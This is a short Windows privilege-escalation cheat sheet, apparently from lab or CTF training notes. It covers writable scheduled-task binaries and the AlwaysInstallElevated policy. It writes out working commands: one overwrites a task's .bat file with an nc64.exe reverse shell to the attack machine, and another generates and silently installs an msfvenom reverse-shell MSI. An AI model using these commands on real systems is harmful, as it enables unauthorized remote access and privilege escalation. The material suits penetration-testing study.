Quick misconfiguration wins
1 Escalate through misconfigurations
1.1 Scheduled tasks
1.2 AlwaysInstallElevated
List scheduled tasks:
C:\> schtasks /query /tn vulntask /fo list /v
Folder: \
HostName: THM-PC1
TaskName: \vulntask
Task To Run: C:\tasks\schtask.bat
Run As User: taskusr1
...
Task To Run is of interest. If the current user can modify or overwrite that executable, we control what gets executed as the taskusr1 user, giving a simple privilege escalation.
Check the file permissions on the executable:
C:\> icacls c:\tasks\schtask.bat
c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
                     BUILTIN\Administrators:(I)(F)
                     BUILTIN\Users:(I)(F)
In this case, the BUILTIN\Users group has full access (F) over the task's binary, so we can modify the .bat file and insert any payload.
Change the .bat file to spawn a reverse shell:
C:\> echo c:\tools\nc64.exe -e cmd.exe <IP address attack machine> 4444 > C:\tasks\schtask.bat
And start a listener on the attack machine:
nc -lvp 4444
The next time the scheduled task runs, you should receive the reverse shell with taskusr1 privileges. Depending on when the task is scheduled to run, this may take a long time.
Query the registry values:
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated must be enabled under both keys (HKCU and HKLM) for this exploitation to work.
Generate an evil .msi file:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP address attack machine> LPORT=<port-number> -f msi -o evil.msi
Run the Metasploit Handler module configured accordingly.
Transfer the file to C:\Windows\Temp on the target machine.
Run the installer with the command below and receive the reverse shell:
C:\> msiexec /quiet /qn /i C:\Windows\Temp\evil.msi
These misconfigurations belong more to the realm of CTF events than to real-world scenarios.
Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or is using a binary you can modify.
Windows installer files (.msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts them, but they can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow for generating a malicious .msi file that would run with admin privileges.